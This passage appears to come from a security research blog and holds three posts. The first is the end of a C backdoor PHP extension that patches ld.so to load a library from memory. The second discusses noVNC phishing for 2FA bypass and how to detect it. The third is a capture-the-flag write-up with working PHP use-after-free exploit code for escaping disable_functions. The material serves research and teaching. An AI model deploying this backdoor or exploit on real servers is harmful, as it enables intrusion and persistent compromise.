   0x00007ffff7fc99b4 <open_verify+116>:    mov    edi,r15d
   0x00007ffff7fc99b7 <open_verify+119>:    call   0x7ffff7fe9b80 <__GI___read_nocancel>

*/
const char read_pattern[] = {0x48, 0x29, 0xc2, 0x48,  0x8d, 0x34,  0x07, 0x44, 0x89, 0xff, 0xe8};
#define read_pattern_length 11

/*
pwndbg> disass 0x7ffff7fcc088,+40
Dump of assembler code from 0x7ffff7fcc088 to 0x7ffff7fcc0b0:
   0x00007ffff7fcc088 <_dl_map_object_from_fd+1208>:    mov    ecx,0x812
   0x00007ffff7fcc08d <_dl_map_object_from_fd+1213>:    mov    DWORD PTR [rbp-0xe0],r11d
   0x00007ffff7fcc094 <_dl_map_object_from_fd+1220>:    call   0x7ffff7fe9cc0 <__mmap64>
*/
const char mmap_pattern[] = {0xb9, 0x12, 0x08, 0x00, 0x00, 0x44, 0x89, 0x9d, 0x20, 0xff, 0xff, 0xff, 0xe8};
#define mmap_pattern_length 13

/*
pwndbg> disass 0x7ffff7fcc0c8,+20
Dump of assembler code from 0x7ffff7fcc0c8 to 0x7ffff7fcc0dc:
   0x00007ffff7fcc0c8 <_dl_map_object_from_fd+1272>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc0ce <_dl_map_object_from_fd+1278>:    lea    rsi,[rbp-0xc0]
   0x00007ffff7fcc0d5 <_dl_map_object_from_fd+1285>:    call   0x7ffff7fe98a0 <__GI___fstat64>
   */
const char fxstat_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xb5, 0x40, 0xff, 0xff, 0xff, 0xe8};
#define fxstat_pattern_length 14

/*
pwndbg> disass 0x7ffff7fcc145,+40
Dump of assembler code from 0x7ffff7fcc145 to 0x7ffff7fcc16d:
   0x00007ffff7fcc145 <_dl_map_object_from_fd+1397>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc14b <_dl_map_object_from_fd+1403>:    call   0x7ffff7fe99f0 <__GI___close_nocancel>
*/
const char close_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0xe8};
#define close_pattern_length 7

/*
pwndbg> disass 0x7ffff7fc996a,+40
Dump of assembler code from 0x7ffff7fc996a to 0x7ffff7fc9992:
   0x00007ffff7fc996a <open_verify+42>: mov    esi,0x80000
   0x00007ffff7fc996f <open_verify+47>: mov    rdi,r14
   0x00007ffff7fc9972 <open_verify+50>: xor    eax,eax
   0x00007ffff7fc9974 <open_verify+52>: call   0x7ffff7fe9b00 <__GI___open64_nocancel>
*/
const char open_pattern[] = {0xbe, 0x00, 0x00, 0x08, 0x00, 0x4c, 0x89, 0xf7, 0x31, 0xc0, 0xe8};
#define open_pattern_length 11

/*
pwndbg> disass 0x00007ffff7fcc275,+40
Dump of assembler code from 0x7ffff7fcc275 to 0x7ffff7fcc29d:
   0x00007ffff7fcc275 <_dl_map_object_from_fd+1701>:    mov    rsi,rax
   0x00007ffff7fcc278 <_dl_map_object_from_fd+1704>:    mov    QWORD PTR [rbp-0x158],rax
   0x00007ffff7fcc27f <_dl_map_object_from_fd+1711>:    call   0x7ffff7fe9bb0 <__GI___pread64_nocancel>
*/
const char pread64_pattern[] = {0x48, 0x89, 0xc6, 0x48, 0x89, 0x85, 0xa8, 0xfe, 0xff, 0xff, 0xe8};
#define pread64_pattern_length 11

const char* patterns[] = {read_pattern, mmap_pattern, pread64_pattern, fxstat_pattern, close_pattern,
                          open_pattern, NULL};
const size_t pattern_lengths[] = {read_pattern_length, mmap_pattern_length, pread64_pattern_length, 
                                  fxstat_pattern_length, close_pattern_length, open_pattern_length, 0};
const char* symbols[] = {"read", "mmap", "pread", "fstat", "close", "open", NULL};
uint64_t functions[] = {(uint64_t)&my_read, (uint64_t)&my_mmap, (uint64_t)&my_pread64, (uint64_t)&my_fstat, 
                        (uint64_t)&my_close, (uint64_t)&my_open, 0}; 
char *fixes[7] = {0};

uint64_t fix_locations[7] = {0};
size_t page_size;
uint64_t first = 0;

bool find_ld_in_memory(uint64_t *addr1, uint64_t *addr2) {
    FILE* f = NULL;
    char  buffer[1024] = {0};
    char* tmp = NULL;
    char* start = NULL;
    char* end = NULL;
    bool  found = false;

    if ((f = fopen("/proc/self/maps", "r")) == NULL){
        return found;
    }

    while ( fgets(buffer, sizeof(buffer), f) ){
        if ( strstr(buffer, "r-xp") == 0 ) {
            continue;
        }
        if ( strstr(buffer, "ld-linux-x86-64.so.2") == 0 ) {
            continue;        
        }

        buffer[strlen(buffer)-1] = 0;
        tmp = strrchr(buffer, ' ');
        if ( tmp == NULL || tmp[0] != ' ')
            continue;
        ++tmp;

        start = strtok(buffer, "-");
        *addr1 = strtoul(start, NULL, 16);
        end = strtok(NULL, " ");
        *addr2 = strtoul(end, NULL, 16);
        found = true;
    }
    fclose(f);
    return found;
}


/* hooks */

int my_open(const char *pathname, int flags) {
    void *handle;
    int (*mylegacyopen)(const char *pathnam, int flags);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyopen = dlsym(handle, "open");
    if (strstr(pathname, "magic.so") != 0){
        printf("\t[+] Open called with magic word. Returning magic FD (0x69)\n");
        return 0x69;
    }
    return mylegacyopen(pathname, flags);
}

ssize_t my_read(int fd, void *buf, size_t count){
    void *handle;
    ssize_t (*mylegacyread)(int fd, void *buf, size_t count);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyread = dlsym(handle, "read");
    if (fd == 0x69){
        size_t size = 0;
        if ( libdata.size - libdata.current >= count ) {
            size = count;
        } else {
            size = libdata.size - libdata.current;
        }
        memcpy(buf, libdata.data + libdata.current, size);
        libdata.current += size;
        printf("\t[+] Read called with magic FD. Returning %ld bytes from memory\n", size);
        return size;
    }
    size_t ret =  mylegacyread(fd, buf, count);
    printf("Size: %ld\n",ret);
    return ret;
}

void * my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){
    int mflags = 0;
    void * ret = NULL;
    uint64_t start = 0;
    size_t size = 0;

    if ( fd == 0x69 ) {
        mflags = MAP_PRIVATE|MAP_ANON;
        if ( (flags & MAP_FIXED) != 0 ) {
            mflags |= MAP_FIXED;
        }
        ret = mmap(addr, length, PROT_READ|PROT_WRITE|PROT_EXEC, mflags, -1, 0);
        size = length > libdata.size - offset ? libdata.size - offset : length;
        memcpy(ret, libdata.data + offset, size);
        mprotect(ret, size, prot);
        if (first == 0){
            first = (uint64_t)ret;
        }
        printf("\t[+] Inside hooked mmap (fd: 0x%x)\n", fd);
        return ret;
    }
    return mmap(addr, length, prot, flags, fd, offset);
}


int my_fstat(int fd, struct stat *buf){
    void *handle;
    int (*mylegacyfstat)(int fd, struct stat *buf);


    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyfstat = dlsym(handle, "fstat64");

    if ( fd == 0x69 ) {
        memset(buf, 0, sizeof(struct stat));
        buf->st_size = libdata.size;
        buf->st_ino = 0x666; // random number
        printf("\t[+] Inside hooked fstat64 (fd: 0x%x)\n", fd);
        return 0;
    }
    return mylegacyfstat(fd, buf);
}

int my_close(int fd) {
    if (fd == 0x69){
        printf("\t[+] Inside hooked close (fd: 0x%x)\n", fd);
        return 0;
    }
    return close(fd);
}

ssize_t my_pread64(int fd, void *buf, size_t count, off_t offset) {
    void *handle;
    int (*mylegacypread)(int fd, void *buf, size_t count);

    handle = dlopen(LIBC, RTLD_NOW);
    mylegacypread = dlsym(handle, "pread");
    printf("\t[+] Inside pread64 (FD: %d)\n", fd);
    return mylegacypread(fd, buf, count);
}


/* Patch ld.so */
bool search_and_patch(uint64_t start_addr, uint64_t end_addr, const char* pattern, const size_t length, const char* symbol, const uint64_t replacement_addr, int position) {

    bool     found = false;
    int32_t  offset = 0;
    uint64_t tmp_addr = 0;
    uint64_t symbol_addr = 0;
    char * code = NULL;
    void * page_addr = NULL;

    tmp_addr = start_addr;
    while ( ! found && tmp_addr+length < end_addr) {
        if ( memcmp((void*)tmp_addr, (void*)pattern, length) == 0 ) {
            found = true;
            continue;
        }
        ++tmp_addr;
    }

    if ( ! found ) {
        return false;
    }

    offset = *((uint64_t*)(tmp_addr + length));
    symbol_addr = tmp_addr + length + 4 + offset;

    //Save data to fix later
    fixes[position] = malloc(stub_length * sizeof(char));
    memcpy(fixes[position], (void*)symbol_addr, stub_length);
    fix_locations[position] = symbol_addr;
    printf("[*] Symbol: %s - Addr: %lx\n", symbol, fix_locations[position]);

    code = malloc(stub_length * sizeof(char));
    memcpy(code, stub, stub_length);
    memcpy(code+6, &replacement_addr, sizeof(uint64_t));

    page_addr = (void*) (((size_t)symbol_addr) & (((size_t)-1) ^ (page_size - 1)));
    mprotect(page_addr, page_size, PROT_READ | PROT_WRITE); 
    memcpy((void*)symbol_addr, code, stub_length);
    mprotect(page_addr, page_size, PROT_READ | PROT_EXEC); 
    return true;
}

/* Read file from disk */
bool load_library_from_file(char * path, lib_t *libdata) {
    struct stat st;
    FILE * file;
    size_t read;

    if ( stat(path, &st) < 0 ) {
        return false;
    }

    libdata->size = st.st_size;
    libdata->data = malloc( st.st_size );
    libdata->current = 0;

    file = fopen(path, "r");

    read = fread(libdata->data, 1, st.st_size, file);
    fclose(file);

    return true;
}

/* remove hooks */
bool fix_hook(char *fix, uint64_t addr){
    void *page_addr = (void*) (((size_t)addr) & (((size_t)-1) ^ (page_size - 1)));
    mprotect(page_addr, page_size, PROT_READ | PROT_WRITE);
    memcpy((void *)addr, fix, stub_length);
    mprotect(page_addr, page_size, PROT_READ | PROT_EXEC);
    return true;
}

extern void restore(void){
    int i = 0;
    printf("---------------------------------------\n");
    printf("[*] Fixing hooks\n");
    while ( patterns[i] != NULL ) {
           if ( ! fix_hook(fixes[i], fix_locations[i]) ) {
               return;
           }
           ++i;
    }
    return;
}

void patch_all(void){
    uint64_t start = 0;
    uint64_t end = 0;
    size_t i = 0;
    
    page_size = sysconf(_SC_PAGESIZE);
    printf("\t\t-=[ Proof of Concept ]=-\n\n");

    if (!load_library_from_file("/home/vagrant/research/php/backdoor/adepts/adepts.so", &libdata)){
        return;
    }
    if (!find_ld_in_memory(&start, &end)){
        return;
    }
    printf("[*] ld.so found in range [0x%lx-0x%lx]\n", start, end);
    printf("-------------[ Patching  ]-------------\n");
    while ( patterns[i] != NULL ) {
        if ( ! search_and_patch(start, end, patterns[i], pattern_lengths[i], symbols[i], functions[i], i) ) {     
            return;
        } 
        ++i;
    }
    printf("---------------------------------------\n");
    return;
}


static void check(void) __attribute__((constructor));
void check(void){
    printf("~~~> Hello from adepts.o <~~~\n");
    return;
}

/* Functions to execute */
zend_result onLoad(int a, int b){
    printf("[^] Executing onLoad\n");
    void* handle = dlopen("/home/vagrant/research/php/backdoor/adepts/adepts.so", RTLD_LAZY);
    while (dlclose(handle) != -1){
        printf("[*] dlclose()\n");
    }
    return SUCCESS;
}
zend_result onRequest(void){
    php_printf("\n[/!\\] Adepts of 0xCC [/!\\]\n\n");
    return SUCCESS;
}


// Basic zend_module_entry
zend_module_entry adepts_module_entry = {
    STANDARD_MODULE_HEADER,
    "adepts",                   /* Extension name */
    NULL,                   /* zend_function_entry */
    NULL,                           /* PHP_MINIT - Module initialization */
    NULL,                           /* PHP_MSHUTDOWN - Module shutdown */
    NULL,           /* PHP_RINIT - Request initialization */
    NULL,                           /* PHP_RSHUTDOWN - Request shutdown */
    NULL,           /* PHP_MINFO - Module info */
    PHP_ADEPTS_VERSION,     /* Version */
    STANDARD_MODULE_PROPERTIES
};

//Function "get_module" that will be executed by PHP
__attribute__((visibility("default")))
extern zend_module_entry *get_module(void){
    patch_all();
    void *handler = dlopen("./magic.so", RTLD_LAZY); 
    restore();

    static Dl_info info;
    dladdr(&info, &info);
    uint64_t diffLoad = (uint64_t)&onLoad - (uint64_t)info.dli_fbase;
    uint64_t diffRequest = (uint64_t)&onRequest - (uint64_t)info.dli_fbase;
    uint64_t newLoad = first + diffLoad;
    uint64_t newRequest = first + diffRequest;

    uint64_t diffModule = (uint64_t)&adepts_module_entry - (uint64_t)info.dli_fbase;
    ((zend_module_entry *)(diffModule + first))->module_startup_func = (void *)newLoad;
    ((zend_module_entry *)(diffModule + first))->request_shutdown_func = (void *)newRequest;
    return (void *)(diffModule + first);
}



#ifdef COMPILE_DL_ADEPTS
# ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
# endif
ZEND_GET_MODULE(adepts)
#endif

EoF

We hope you enjoyed this reading. This same technique leveraged by memdlopen can be used in different situations like, for example, loading a complex backdoor (a whole shared library vs a simple shellcode) from a socket avoiding the usage of memfd_create.

Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Thoughts on the use of noVNC for phishing campaigns

9 September 2022 at 00:00

Dear Fellowlship, today’s homily is a rebuke to all those sinners who have decided to abandon the correct path of reverse proxies to bypass 2FA. Penitenziagite!

Prayers at the foot of the Altar a.k.a. disclaimer

This post will be small and succinct. It should be clear that these are just opinions about this technique that has become trendy in the last weeks, so it will be a much less technical article than we are used to. Thanks for your understanding :)

Introduction

In recent weeks, we have seen several references to this technique in the context of phishing campaigns, and its possible use to obtain valid sessions by bypassing MFA/2FA. Until now, the preferred technique for intercepting and reusing sessions to evade MFA/2FA has been the use of reverse proxies such as Evilginx or Muraena. These new proof of concepts based on HTML5 VNC clients boil down to the same concept: establishing a Man-in-the-Middle scheme between the victim’s browser and the target website, but using a browser in kiosk mode to act as a proxy instead of a server that parses and forwards the requests.

Probably the article that started this new trend was Steal Credentials & Bypass 2FA Using noVNC by @mrd0x.

Reverse proxy > noVNC

We believe the usage of noVNC and similar technologies is really interesting as proof of concepts, but at the moment they do not reach the bare minimum requirements to be used in real Red Team engagements or even pentesting. Let’s take EvilnoVNC as an example.

While testing this tool the following problems arise:

  • Navigation is clunky as hell.
  • The URL does not change, always remains the same while browsing.
  • The back button breaks the navigation in the β€œreal browser”, and not in the one inside the docker.
  • Right-click is disabled.
  • Links do not show the destination when onmouseover.
  • Wrong screen resolution.
  • Etc.

Even an untrained user would find out about these issues just with the look and feel.

Look And Feel
Look and feel.

On the other hand, the operator is heavily restricted in order to achieve a minimum of OPSEC. As an example, we can think about the most basic check we should bypass: User-Agent. Mimicking the User-Agent used by the victim is trivial when dealing with proxies, as we only need to forward it in the request from our server to the real website, but in the case of a browser using kiosk mode it is a bit more difficult to achieve. And the same goes for other modifications that we should make to the original request like, for example, blocking the navigation to a /logout endpoint that would nuke the session.

Another fun fact about this tool is… it does not work. If you test the tool you will find the following:

psyconauta@insulanova:/tmp/EvilnoVNC/Downloads|main⚑ β‡’  cat Cookies.txt

        Host: .google.com
        Cookie name: AEC
        Cookie value (decrypted): Encrypted
        Creation datetime (UTC): 2022-09-10 19:44:54.548204
        Last access datetime (UTC): 2022-09-10 21:31:39.833445
        Expires datetime (UTC): 2023-03-09 19:44:54.548204
        ===============================================================

        Host: .google.com
        Cookie name: CONSENT
        Cookie value (decrypted): Encrypted
        Creation datetime (UTC): 2022-09-10 19:44:54.548350
        Last access datetime (UTC): 2022-09-10 21:31:39.833445
        Expires datetime (UTC): 2024-09-09 19:44:54.548350
        ===============================================================
(...)

Which is really odd. If you check the code from the GitHub repo…

import os
import json
import base64
import sqlite3
from datetime import datetime, timedelta

def get_chrome_datetime(chromedate):
    """Return a `datetime.datetime` object from a chrome format datetime
    Since `chromedate` is formatted as the number of microseconds since January, 1601"""
    if chromedate != 86400000000 and chromedate:
        try:
            return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
        except Exception as e:
            print(f"Error: {e}, chromedate: {chromedate}")
            return chromedate
    else:
        return ""

def main():
    # local sqlite Chrome cookie database path
    filename = "Downloads/Default/Cookies"
    # connect to the database
    db = sqlite3.connect(filename)
    # ignore decoding errors
    db.text_factory = lambda b: b.decode(errors="ignore")
    cursor = db.cursor()
    # get the cookies from `cookies` table
    cursor.execute("""
    SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 
    FROM cookies""")
    # you can also search by domain, e.g thepythoncode.com
    # cursor.execute("""
    # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value
    # FROM cookies
    # WHERE host_key like '%thepythoncode.com%'""")
    # get the AES key
    for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall():
        if not value:
            decrypted_value = "Encrypted"
        else:
            # already decrypted
            decrypted_value = value
        print(f"""
        Host: {host_key}
        Cookie name: {name}
        Cookie value (decrypted): {decrypted_value}
        Creation datetime (UTC): {get_chrome_datetime(creation_utc)}
        Last access datetime (UTC): {get_chrome_datetime(last_access_utc)}
        Expires datetime (UTC): {get_chrome_datetime(expires_utc)}
        ===============================================================""")
        # update the cookies table with the decrypted value
        # and make session cookie persistent
        cursor.execute("""
        UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0
        WHERE host_key = ?
        AND name = ?""", (decrypted_value, host_key, name))
    # commit changes
    db.commit()
    # close connection
    db.close()


if __name__ == "__main__":
    main()

As you can see, the script is just a rip off from this post, but the author of EvilnoVNC deleted the part where the cookies are decrypted :facepalm:.

The cookies that you never will see
The cookies that you never will see.

You can not grab the cookies because you are setting its value to the literal string Encrypted instead of the real decrypted value :yet-another-facepalm:. We did not check if this dockerized version saves the master password in the keyring or if it just uses the hardcoded β€˜peanuts’. In the former case, copying the files to your profile shouldn’t work.

About detection

The capability to detect this technique heavily relies on what can you inspect. The current published tooling uses a barely modified version of noVNC, meaning that if you are already inspecting web JavaScript to catch malicious stuff like HTML smuggling, you could add signatures to detect the use of RFB. Of course it is trivial to bypass this by simply obfuscating the JavaScript, but you are sure to catch a myriad of ball-busting script kiddies.

psyconauta@insulanova:/tmp/EvilnoVNC/Downloads|main⚑ β‡’  curl http://localhost:5980/ 2>&1 | grep RFB
        // RFB holds the API to connect and communicate with a VNC server
        import RFB from './core/rfb.js';
        // Creating a new RFB object will start a new connection
        rfb = new RFB(document.getElementById('screen'), url,
        // Add listeners to important events from the RFB module

Moreover, all control is done through the RFB over WebSockets protocol, so it is quite easy to spot this type of traffic as it is unencrypted at the application level.

RFB traffic in clear being send through WebSockets (ws:yourdomain/websockify)
RFB traffic being sent through WebSockets (ws:yourdomain/websockify).

Additionally, because this protocol is easy to implement, you can create a small script to send keystrokes and/or mouse movements directly to escape from Chromium to the desktop.

Jailbreak
Jailbreaking chromium.

This tool executes noVNC on a docker so there is not much to do after escaping from Chromium, but think about other script kiddies who execute it directly on a server :). Automating the scanner & pwnage of this kind of phishing sites is easy if you have the time.

From the point of view of the endpoint to log into, it is easier to detect the use of a User-Agent other than the usual one. If your user base accesses your VPN web portal from Windows, someone connecting from Linux should trigger an alert.

And finally, the classic β€œtraining-education-whatever” of users would help a lot as the current state of the art is trivial to spot.

EoF

Tooling around this concept of MFA/2FA bypassing is still too rudimentary to be used in real engagements, although they are really cool proof of concepts. We believe it will evolve within the next years (or months) and people will start to work on better approaches. For now, reverse proxies are still more powerful as they can be easily configured to blend in with legitimate traffic, and the user does not experience look and feel annoyances.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

In the land of PHP you will always be (use-after-)free

6 April 2022 at 12:37

Dear Fellowlship, today’s homily is about the quest of a poor human trying to escape the velvet jail of disable_functions and open_basedir in order to achieve the holy power of executing arbitrary commands. Please, take a seat and listen to the story of how our hero defeated PHP with the help of UAF The Magician.

Prayers at the foot of the Altar a.k.a. disclaimer

First of all we have to apologize because of our delay on the publication date: this post should have been released 7 days ago.

The challenge was solved only by @kachakil and @samsa2k8, you can read their approach here. About 7-8 users were participating actively during the whole week, and only 2 (plus the winners) were in the right direction to get the flag, although everyone tried to use known exploits. Our intention was to avoid that and force people to craft their exploits from scratch but… a valid flag is a valid flag :).

We are going to keep releasing different challenges during the year, so keep an eye. We promise to add a list of winners in our blog :D

In case you did not read our tweet with the challenge, you can deploy it locally with docker and try to solve it.

And last but not least, it is CRUCIAL TO READ THIS ARTICLE BEFORE: A deep dive into disable_functions bypasses and PHP exploitation. Tons of details about disable_functions and the exploit methodology is explained in depth in that article, so this information is not going to be repeated here. Be wise and stop reading the current post until you end the other.

Prologue

The intention of this first challenge was to highlight something that is pretty obvious for some of us but that others keep struggling to accept: disabling β€œwell-known” functions and restricting the paths through open_basedir IS TRIVIAL TO BYPASS. People does not realize how easy they are to bypass. If you have a web platform that have vulnerabilities that could lead to the execution of arbitrary PHP, you are fucked. PHP is so full of β€œbugs” (we will not call them β€œvulnerabilities”) in their own internals that it costs less than 5 minutes to find something abusable to bypass those restrictions.

Of course disabling functions is usefull and highly recommended because it is going to block most of script kiddies trying to pwn your server with the last vulnerability affecting a framework/CMS, but keep in mind that for a real attacker this is not going to stop him. And also this applies for pentesters and Red Teamers.

If you, our dearest reader, wonder about what sophisticated techniques we follow to identify β€œhappy accidents” that can be used for bypassing… fuzzing? code review? Nah! Just go to the PHP bug tracker and search for juicy keywords and then sort by date:

Results for use-after-free on PHP bugtracker
Results for "use-after-free" on PHP bugtracker

In our case the first one (Bug #81705 type confusion/UAF on set_error_handler with concat operation) can fit our needs as the function set_error_handler is enabled.

Dream Theater - The root of all evil

The issue and the root cause are well explained in the original report, so we are going to limit ourselves by quoting the original text:

Here is a proof of concept for crash reproduction:

<?php

$my_var = str_repeat("a", 1);
set_error_handler(
    function() use(&$my_var) {
        echo("error\n");
        $my_var = 0x123;
    }
);
$my_var .= [0];

?>

If you execute this snippet, it should cause SEGV at address 0x123.

(…)

When PHP executes the line $my_var .= [0];, it calls concat_function defined in Zend/zend_operators.c to try to concat given values. Since the given values may not be strings, concat_functiontries to convert them into strings with zval_get_string_func.

ZEND_TRY_BINARY_OBJECT_OPERATION(ZEND_CONCAT);
	ZVAL_STR(&op1_copy, zval_get_string_func(op1));
	if (UNEXPECTED(EG(exception))) {
		zval_ptr_dtor_str(&op1_copy);
		if (orig_op1 != result) {
			ZVAL_UNDEF(result);
		}
		return FAILURE;
	}

If the given value is an array, zval_get_string_func calls zend_error.

case IS_ARRAY:
	zend_error(E_WARNING, "Array to string conversion");
	return (try && UNEXPECTED(EG(exception))) ?
	NULL : ZSTR_KNOWN(ZEND_STR_ARRAY_CAPITALIZED);

Because we can register an original error handler that is called by zend_error by using set_error_handler, we can run almost arbitrary codes DURING concat_function is running.

In the above PoC, for example, $my_var will be overwritten with integer 0x123 when zend_error is triggered. concat_function, however, implicitly assumes the variables op1 and op2 are always strings, and thus type confusion occurs as a result.

Also is needed to quote this message from cmb in the same thread that clarifies the UAF situation:

The problem is that result gets released[1] if it is identical to op1_orig (which is always the case for the concat assign operator). For the script from comment 1641358352[2], that decreases the refcount to zero, but on shutdown, the literal stored in the op array will be released again. If that script is modified to use a dynamic value (range(1,4) instead of [1,2,3,4]), its is already freed, when that code in concat_function() tries to release it again.

[1] https://github.com/php/php-src/blob/php-8.1.1/Zend/zend_operators.c#L1928
[2] https://bugs.php.net/bug.php?id=81705#1641358352

So far we have a reproducible crash and primer for an exploit (in the same thread) from which we can draw ideas. In order to start building our exploit we are going to download PHP and compile it with debug symbols and without optimizations.

cd ../php-7.4.27/
./configure --disable-shared  --without-sqlite3 --without-pdo-sqlite
sed -i "s/ -O2 / -O0 /g" Makefile
make -j$(proc)
sudo make install

Here is my env (yes we are using an older version but do not worry in the epilogue we fix it :P):

PHP 7.4.27 (cli) (built: Feb 12 2022 16:45:41) ( NTS ) 
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies

Let’s run the reproducible crash on GDB using php-cli:

   1860	 			}
   1861	 			op2 = &op2_copy;
   1862	 		}
   1863	 	} while (0);
   1864	 
          // op1=0x007fffffff70c0  β†’  [...]  β†’  0x0000000000000123
 β†’ 1865	 	if (UNEXPECTED(Z_STRLEN_P(op1) == 0)) {
   1866	 		if (EXPECTED(result != op2)) {
   1867	 			if (result == orig_op1) {
   1868	 				i_zval_ptr_dtor(result);
   1869	 			}
   1870	 			ZVAL_COPY(result, op2);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "php", stopped 0x555555b44039 in concat_function (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44039 β†’ concat_function(result=0x7ffff3e55608, op1=0x7ffff3e55608, op2=0x7fffffff7400)
[#1] 0x555555caf4d1 β†’ zend_binary_op(op2=0x7ffff3e911d0, op1=0x7ffff3e55608, ret=0x7ffff3e55608)
[#2] 0x555555caf4d1 β†’ ZEND_ASSIGN_OP_SPEC_CV_CONST_HANDLER()
[#3] 0x555555cfb267 β†’ execute_ex(ex=0x7ffff3e13020)
[#4] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e80380, return_value=0x0)
[#5] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#6] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#7] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)
[#8] 0x555555d026e5 β†’ main(argc=0x2, argv=0x55555678a350)

We can confirm that the issue is present. If we check the original PoC reported on that bug tracker thread we can see this:

// Just for attaching a debugger.
// Removing these lines makes the exploit fail,
// but it doesn't mean this exploit depends on fopen.
// By considering the heap memory that had been allocated for the stream object and
// adjusting heap memory, the exploit will succeed again.

$f = fopen(β€˜php://stdin’, β€˜r’); 
fgets($f);

$my_var = [[1,2,3,4],[1,2,3,4]];
set_error_handler(function() use(&$my_var,&$buf){
    $my_var=1;
    $buf=str_repeat(β€œxxxxxxxx\x00\x00\x00\x00\x00\x00\x00\x00", 16);
});
$my_var[1] .= 1234;

$my_var[1] .= 1234;

$obj_addr = 0;
for ($i = 23; $i >= 16; $i--){
    $obj_addr *= 256;
    $obj_addr += ord($buf[$i]);
}

This code can be adapted to confirm the UAF issue. In our case we can edit it to leak 0x100 bytes of memory:

<?php

function leak_test() {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 255;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= 1337; 
    return $buf;
}


function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


print leak_test();

?>

When we print the $buf variable we can see memory leaked (the pointer in the hex dump is a clear indicator of it -also this pointer is a good leak of the heap-):

➜  concat-exploit php blog01.php | xxd
00000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000010: 6019 40b8 8f7f 0000 0601 0000 0000 0000  `.@.............
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................

Keep in mind that PHP believes this $buf is a string so we can access to read/modify bytes in memory by just $buff[offset]. This means we have a relative write/read primitive that we need to weaponize.

The Primitives - Crash

Once we have identified the vulnerability and how to trigger it we need to find a way to get arbitrary read and write primitives. To build our exploit we are going to follow a similar schema as the exploit that Mm0r1 created for the BackTrace bug (the exploit is explained in depth in the article linked at the beggining of this post, so go and read it!).

If you remember this fragment from the quoted thread:

The problem is that result gets released[1] if it is identical to op1_orig (which is always the case for the concat assign operator)

We can take advantage of this to get the ability to release memory at our will. As we saw with the 0x123 crash example, we can forge a fake value that is going to be passed to the PHP internal functions in charge to release memory. Let’s build a De Bruijn pattern using ragg2 and use it:

<?php

function free() {

         $contiguous = [];
            for ($i = 0; $i < 10; $i++) {
                $contiguous[] = alloc(0x100, "D");
            }
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
        
    }


function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}




print free();

?>

Fire in the hole!

─────────────────────────────────────────────────────────────────────────────────────────────── source:/home/vagrant/E[...].h+1039 ────
   1034	 	ZEND_RC_MOD_CHECK(p);
   1035	 	return ++(p->refcount);
   1036	 }
   1037	 
   1038	 static zend_always_inline uint32_t zend_gc_delref(zend_refcounted_h *p) {
          // p=0x007fffffff72b8  β†’  0x4141484141474141
 β†’ 1039	 	ZEND_ASSERT(p->refcount > 0);
   1040	 	ZEND_RC_MOD_CHECK(p);
   1041	 	return --(p->refcount);
   1042	 }
   1043	 
   1044	 static zend_always_inline uint32_t zend_gc_addref_ex(zend_refcounted_h *p, uint32_t rc) {
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
